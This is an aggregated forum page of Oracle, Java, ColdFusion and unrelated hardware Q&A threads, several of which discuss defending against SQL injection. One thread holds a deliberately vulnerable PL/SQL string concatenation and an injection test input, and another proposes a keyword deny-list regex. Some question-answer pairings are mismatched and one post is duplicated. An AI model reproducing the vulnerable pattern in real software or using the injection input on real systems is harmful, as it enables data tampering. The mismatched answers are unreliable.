[ask] about oracle sql injection and escalation

Similar Messages

• A silly question about oracle.sql.timestamp and java.sql.timestamp

  Hi,
  I'm looking at a method that takes objects of type Object and does stuff if the object is really a java.sql.timestamp. If it is not then an error is flagged. In my case it flags an error when an object of type oracle.sql.timestamp is passed to it. Not really entirely comfortable with java (i'm still learning it), here's my stupid question :- why isn't oracle.sql.timestamp a subclass of java.sql.timestamp? Also in various books it indicates that java.sql.timestamp maps to oracle.sql.timestamp. Does that mean you have to physically do the mapping:
  i.e.
  java.sql.Timestamp t = new Timestamp( new oracle.sql.Timestamp( CURRENTTIMESTAMP ).timestampValue() );
  or is there something else to it.
  Thanks.
  Harold.

  The best forum for this is probably Forum Home » Java » SQLJ/JDBC
  Presumably you are refering to oracle.sql.TIMESTAMP. While this is intended to (and does) correspond to java.sql.Timestamp it can't be a subclass because it needs to be a subclass of oracle.sql.Datum.

• SQL Injections and XSS - Escaping Special Characters

  Hi, hope someone can help in regards to security and SQL Injections and XSS.
  We are using APEX 4.0.2 on Oracle 11.2.0.2.
  1. It seems the special characters we have entered into normal 'Text Items' 'Text Areas' etc are not being escaped (ie <,>,&, '). If I enter them into the field (ie Surname) they are saved as is into session state and the database - no escaping. Am I missing something such as an environment setting as I thought the "smart" oracle escaping rules would cater for this.
  Surely I don't have to manually do each of then.
  Just to confirm, am I looking in the correct places to assess if the characters are escaped or not - ie should they show as '&amp;&lt;&gt;' in session state and/or the database ?
  2. Also, for the Oracle procedures such as '‘wwv_flow.accept’ , ‘wwv_flow.show’ , 'wwv_flow_utilities.show_as_popup_calendar' - do these escape special characters. If not, then they must be vulnerable to SQL Injections attacks.
  Thx
  Nigel

  Recx Ltd wrote:
  Just to pitch in, escaping values internally (either in the database or session state) is extremely problematic. Data searches, string comparison, reporting and double escaping are all areas which suffer badly when you do this.
  Stripping characters on input can also cause problems if not considered within the context of the application. Names such as "O'Niel", statistical output such as "n < 300", fields containing deliberate HTML markup can be annoying to debug. In certain situations stripping is totally ineffective and may still lead to cross-site scripting.
  Apex applications that share the database with other applications will also be affected.
  The database should contain 'raw' unfettered data and output should be escaped properly, as Joel said, at render time. Either with Apex attributes or using PLSQL functions such as htf.escape_sc() as and when required.Do not needlessly resurrect old threads. After a couple of months watches expire and the original posters are not alerted to the presence of your follow-up.
  Shameless plug: If you are in the game of needing to produce secure Apex code, you should get in touch.This crosses the line into spam: it violates the OTN Terms of Use&mdash;see 6(j).
  Promotional posts like this are liable to be removed by the moderators.

• About Oracle SQL Certification Details

  Hi All,
  I want to Details About Oracle SQL Certification. How many Type and what are there.
  Thanks & Regards

  You will get better answers in the [Oracle Certification Forum|http://forums.oracle.com/forums/forum.jspa?forumID=459]
  Thanks,
  Karthick.

• Oracle.sql.BLOB and oracle.sql.STRUCT

  I'm development a application in Java with oracle, to manage media files. When I try to insert into oracle , I have this problem "oracle.sql.BLOB cannot be cast to oracle.sql.STRUCT" , and I don't know what that can be ..
  This is my code , please help with that.. If you have a smaple code of java and oracle to insert media , that will be a great help ..
  public void loadDataFromStream(OracleConnection con)
  try {
  Statement s = con.createStatement();
  OracleResultSet rs = (OracleResultSet)
  s.executeQuery("select * from blobs where id='video2.avi' for update ");
  String index = "";
  while(rs.next())
  index = rs.getString(1);
  index+="1";
  System.out.println("llego hasta aki");
  // el error esta en esta linea de abajo ...
  OrdVideo vidObj = (OrdVideo) rs.getCustomDatum(2, OrdVideo.getFactory());
  //rs.getBfile(3);///
  FileInputStream fStream = new FileInputStream("/home/jova/movie.avi");
  vidObj.loadDataFromInputStream(fStream);
  vidObj.getDataInFile("/home/jova/movie.avi");
  fStream.close();
  System.out.println(" getContentLength output : " +
  vidObj.getContentLength());
  OraclePreparedStatement stmt1 =
  (OraclePreparedStatement) con.prepareCall("update blob_col set image = ? where id = " + index);
  stmt1.setCustomDatum(1,vidObj);
  stmt1.execute();
  stmt1.close() ;
  index+="1";
  System.out.println("OK");
  catch(Exception e) {
  System.out.println("exception raised " + e);
  System.out.println("load data from stream unsuccessful");
  }

  I'm development a application in Java with oracle, to manage media files. When I try to insert into oracle , I have this problem "oracle.sql.BLOB cannot be cast to oracle.sql.STRUCT" , and I don't know what that can be ..
  This is my code , please help with that.. If you have a smaple code of java and oracle to insert media , that will be a great help ..
  public void loadDataFromStream(OracleConnection con)
  try {
  Statement s = con.createStatement();
  OracleResultSet rs = (OracleResultSet)
  s.executeQuery("select * from blobs where id='video2.avi' for update ");
  String index = "";
  while(rs.next())
  index = rs.getString(1);
  index+="1";
  System.out.println("llego hasta aki");
  // el error esta en esta linea de abajo ...
  OrdVideo vidObj = (OrdVideo) rs.getCustomDatum(2, OrdVideo.getFactory());
  //rs.getBfile(3);///
  FileInputStream fStream = new FileInputStream("/home/jova/movie.avi");
  vidObj.loadDataFromInputStream(fStream);
  vidObj.getDataInFile("/home/jova/movie.avi");
  fStream.close();
  System.out.println(" getContentLength output : " +
  vidObj.getContentLength());
  OraclePreparedStatement stmt1 =
  (OraclePreparedStatement) con.prepareCall("update blob_col set image = ? where id = " + index);
  stmt1.setCustomDatum(1,vidObj);
  stmt1.execute();
  stmt1.close() ;
  index+="1";
  System.out.println("OK");
  catch(Exception e) {
  System.out.println("exception raised " + e);
  System.out.println("load data from stream unsuccessful");
  }

• XML Validation using java for SQL Injection and script validation

  I have an input coming from xml file.
  I have to read that input and validate the input against sql injections and scripts.
  I require help now how to read this xml data and validate against the above two options.
  I am a java developer.
  in this context what is marshelling?

  http://www.ibm.com/developerworks/library/x-javaxmlvalidapi.html?ca=dgr-lnxw07Java-XML-Val
  http://java.sun.com/j2se/1.5.0/docs/api/javax/xml/validation/package-summary.html
  The following code validates the xml against a xml schema
  // define the type of schema - we use W3C:
  String schemaLang = "http://www.w3.org/2001/XMLSchema";
  SchemaFactory factory = SchemaFactory.newInstance(schemaLang);
  Schema schema = factory.newSchema(new StreamSource("sample.xsd"));
  Validator validator = schema.newValidator();
  // at last perform validation:
  validator.validate(new StreamSource("sample.xml"));Message was edited by:
  haishai

• SQL Injection and cfqueryparam

  I was told to look into <cfqueryparam> to assist in
  fighting sql-injection
  and it makes perfect sense, up until I thought of a different
  scenario...
  This tag seems great when you are dealing with numbers or
  text that you can
  restrict the number of characters, but what if you have a
  textarea that
  allows for a large amount of text to be entered? I.E. a
  search field for
  records that uses keywords.
  How you stop someone from entering damaging sql into an area
  that accepts
  this?
  Thanks for any education.
  Wally Kolcz
  MyNextPet.org
  Founder / Developer
  586.871.4126

  WebDev wrote:
  It works because <cfqueryparam ....> tells the DBMS
  that this data is a
  value NOT SQL. The DBMS will then never process it as SQL.
  When you
  write the SQL and Values straight into the code, then the
  DBMS does not
  know what is what and assumes it all must be SQL.
  An Example...
  <cfquery ....>
  SELECT aField FROM aTable WHERE aField = '#aValue#'
  </cfquery>
  With this code, ColdFusion process the entire body of the
  <cfquery...>
  tag into a string and sends that entire string to the DBMS as
  SQL. The
  DBMS then processes what it was given. If somebody can modify
  the
  aValue variable to change the SQL string - that is what is
  processed.
  <cfquery ...>
  SELECT aField FROM aTable WHERE aField = <cfqueryParam
  value="#aValue#"...>
  </cfquery>
  With this code ColdFusion process the SQL and the queryParam
  as separate
  things. It sends the DBMS the SQL with parameters and a list
  of values
  to be used in those parameters. The DBMS knows the parameters
  are not
  SQL and will not process it as SQL and if the parameter
  contains SQL it
  will just be used as a value and not parsed.
  FYI... That is how <cfqueryparam...> can improve
  performance. By
  knowing what parts of the SQL are variables, it can cache the
  SQL and
  just use different variables when they are passed to the
  DBMS.
  HTH
  Ian

• Oracle SQL*Net and TNS Protocol

  I need to get technical documents on Oracle SQL*Net and TNS Proticol, down to the bit-level definition. I have talked to serveral people in Oracle Documentation, Sales and Tech Support, but no one could give me any clue so far. Any one can help me on this?

  SQL*Net is installed by default with SQL*Plus and any of the clients (OEM uses the JDBC OCI driver and some native connectivity).
  It is likely that the version of the client you have installed is not one that TOAD can work with or it can't find the client (is the Oracle home/bin directory in the path?)

• Error oracle.sql.* and oracle.jdbc.driver.* not found when using oracle as a database

  I am using oracle as database and weblogic 4.5. I have copied the classes12.zip file in lib directory of weblogic. I am getting the error that oracle.sql.* and oracle.jdbc.driver.* not found when i am importing these packages in a jsp file. what i need to do to import oracle driver packages?I put it in the classpath also.
  Please Advice!
  Thanks in advance
  AnuPama

  Hi Anupama,
  First of all I would be surprised if you would not like to use the connection pooling feature of weblogic (in which case you might not be needing the import the classes directly), and would like to open direct connections to your database. Anyways for doing that I would recommend you to check out the readme doc that ships
  along with the jdbc oracle (classes12.zip etc). I am giving an excerpt over here:
  These are a few simple things that you should do in your JDBC program:
  1. Import the necessary JDBC classes in your programs that use JDBC.
  For example:
  import java.sql.*;
  import java.math.*;
  2. Register the Oracle driver before before calling other JDBC APIs.
  (This is not needed if you are using the JDBC Server-side Internal
  Driver because registration is done automatically in the server.)
  To register the Oracle driver, make sure the following statement
  is executed at least once in your Java session:
  DriverManager.registerDriver(
  new oracle.jdbc.driver.OracleDriver());
  3. Open a connection to the database with the getConnection call.
  Different connection URLs should be used for different JDBC
  drivers. The following examples demonstrate the different URLs.
  For the JDBC OCI8 Driver:
  Connection conn = DriverManager.getConnection(
  "jdbc:oracle:oci8:@<database>",
  "scott", "tiger");
  where <database> is either an entry in tnsnames.ora or a SQL*net
  name-value pair.
  For the JDBC Thin Driver, or Server-side Thin Driver:
  Connection conn = DriverManager.getConnection(
  "jdbc:oracle:thin:@<database>",
  "scott", "tiger");
  where <database> is either a string of the form
  <host>:<port>:<sid> or a SQL*net name-value pair.
  For the JDBC Server-side Internal Driver:
  Connection conn = DriverManager.getConnection(
  "jdbc:oracle:kprb:");
  Note that the trailing ':' character is necessary. When you use
  the Server-side Internal Driver, you always connect to the
  database you are executing in. You can also do this:
  Connection conn
  = new oracle.jdbc.driver.OracleDriver().defaultConnection();
  Hope this helps,
  Thanks,
  Anupama wrote:
  I am using oracle as database and weblogic 4.5. I have copied the classes12.zip file in lib directory of weblogic. I am getting the error that oracle.sql.* and oracle.jdbc.driver.* not found when i am importing these packages in a jsp file. what i need to do to import oracle driver packages?I put it in the classpath also.
  Please Advice!
  Thanks in advance
  AnuPama--
  Apurb Kumar

• I want to buy MacBook pro but I'm wandering for the keyboard could Mac's shop change the keyboard into Arabic keyboard. I want to buy 2 laptops . I have friends in USA and they visited Apple store and they asked about change the keyboard and they said Ok

  I want to buy MacBook pro but I'm wandering for the keyboard could Mac's shop change the keyboard into Arabic keyboard. I want to buy 2 laptops . I have friends in USA and they visited Apple store and they asked about change the keyboard and they said Ok (the Apple store) so, I don't know about Australia store
  I'm student and my une (university of New England )  give me 10% discount for each. Thanks

  alifromarmidale wrote:
  I need the keyboard English with Arabic. Thanks
  These are user to user technical assistance forums, and nobody here represents Apple or any store.  In order to find out whether you can buy something at a particular store, you really need to find some way to contact the store directly.

• I have few questions to ask about the Expert Series and Valet Series

  Hello.
  I have few questions to ask about the Expert Series and Valet Series.
  1. I see there aren't any print server/bridge/access point for these two new series. Do I have to use previous ones? Or the new ones are in planned in near future?
  2. Do I "HAVE TO USE CONNECT SOFTWARE"?  Can I just use web interface to do every setting that these routers features?
  3. Does expert series routers support guest network and parental control?
  4. When I look into informations of these router, some router doesn't give information about backward compatible to older standards. Do I have to consider that as they are backward compatible with older standards?
  Ok, that's all for now.
  If I need to ask more questions I will do that in this thread as reply

  With the New Expert or the Valet Series Router, you still can use the Print Server / Bridge and Access Points.
  Well with the Expert and Valet Series router, you have an option to User Cisco Connect Software or you can User Web Interface of the Router. But with the Cisco Connect Software you have an Advantage of creating a Guest Account and using Parental Control , which is not available using the Web Interface.
  These both the routers are backward compatible and they can connect to your G Series Product.

• Oracle SQL Developer and Errors (Line Number Incorrect)

  First, I wanted to state that Oracle SQL Developer 2 is a standout job.
  I wanted to report, though, that when Oracle SQL Developer 2 can't compile a block of code or a simple SQL statement has invalid syntax, it does not have an option to accurately go to the line of code in question. GOING TO the erroneous line of code doesn't need to be a feature, but often times the line no. REPORTED by Oracle SQL Developer is incorrect by 50+ lines.
  Is this something I could fix on my end? I have five other developers griping about this.
  Thank you!

  I don't know if this is the situation you are talking about, but line numbers for errors in SQL in a SQL Worksheet are not line numbers within the statement but rather line numbers in the worksheet. For example, with the following SQL in the worksheet:
  select * from dual;
  select * from dual;
  select * from dual;
  select from dual;Running the "select from dual;" statement (as either statement based on cursor position, selected statement or as script), the error is reported on Line 4, Column 7. As I show line numbers (Tools | Preferences | Code Editor | Line Gutter | Show Line Numbers), this makes sense. Without line numbers showing or having the option to go to the error and with more realistic examples with SQL statements scrolling off the page, I can see that the line number in the errors wouldn't be helpful.
  I think -K- is talking about the PL/SQL code editors not reporting the correct line number based on the error line not counting the "create or replace" line at the start of a package (and more for triggers).
  theFurryOne

• Oracle sql developer and access db

  Hi All,
  I have connection to oracle and Access dbs’ on my oracle sql developer.
  When i try to create a database link from oracle db to access db i have to add Host Name.
  Connection details to access looks like this :
  @jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\ list.mdb;DriverID=22;READONLY=false}
  I tried different variants, but it doesn’t work.
  Is this possible to create database link to access db, and if yes, what i have to add for a host name and what is the syntaxes for cross table ?
  Thank you

  Good documentation here... http://www.orafaq.com/node/60
  TimS

• SQL Injection and variable substitutions

  Hello helpful forum, I'm trying to understand what really goes on "behind" the scenes
  with the variable substitutions in order to protect from sql injections.
  I'm using apex 3.0.0.00.20
  The trickiest component seems to be a Report of type "pl/sql returning sql", since
  multiple dynamic sql interpretations are done there.
  consider the following innocent looking disaster:
  DECLARE
  l_out VARCHAR2(2000);
  BEGIN
  l_out := 'select * from test_injection t where t.name like ''%' || :NAME || '%''';
  RETURN l_out;
  END;
  if NAME is a single quote the report will return:
  failed to parse SQL query: ORA-00911: invalid character
  which hints to the fact that NAME is not escaped, and you are in fact able to access db functions
  as in: '||lower('S')||'
  I also tried to put there a function that runs in a autonomous transaction to log its calls, and
  I see that it's called five times for each request.
  consider now the similar solution (notice the two single quotes):
  DECLARE
  l_out VARCHAR2(2000);
  BEGIN
  l_out := 'select * from test_injection t where t.name like ''%'' || :NAME || ''%''';
  RETURN l_out;
  END;
  with this second example nothing of the above is possible.
  So my theory (please confirm it or refute it) is that there is a first variable substitution done
  at the pl/sql level (and in the second case :NAME is just a string so nothing is substituted).
  Then the dynamic sql is executed and it returns the following string:
  select * from test_injection t where t.name like '%' || :NAME || '%'
  now another substitution is done (at an "APEX" level) and then query is finally executed to return
  the rows to the report.
  The tricky point seems to be that the first substitution doesn't escape the variable (hence the error
  with the single quote), while the second substitution does.
  Please let me know if this makes sense and what are the proper guidelines to avoid sql injection with
  the different kinds of reports and components (SQL, pl/sql returning sql, processes, ...)
  Thanks

  Giovanni,
  You should build report regions like this using the second method so that all bind variables (colon followed by name) appear in the resultant varchar2 variable, l_out in your example, which will then be parsed as the report query. This addresses not only the SQL injection problem but the shared-pool friendliness problem.
  Scott

• SQL Injection and Java Regular Expression: How to match words?

  Dear friends,
  I am handling sql injection attack to our application with java regular expression. I used it to match that if there are malicious characters or key words injected into the parameter value.
  The denied characters and key words can be " ' ", " ; ", "insert", "delete" and so on. The expression I write is String pattern_str="('|;|insert|delete)+".
  I know it is not correct. It could not be used to only match the whole word insert or delete. Each character in the two words can be matched and it is not what I want. Do you have any idea to only match the whole word?
  Thanks,
  Ricky
  Edited by: Ricky Ru on 28/04/2011 02:29

  Avoid dynamic sql, avoid string concatenation and use bind variables and the risk is negligible.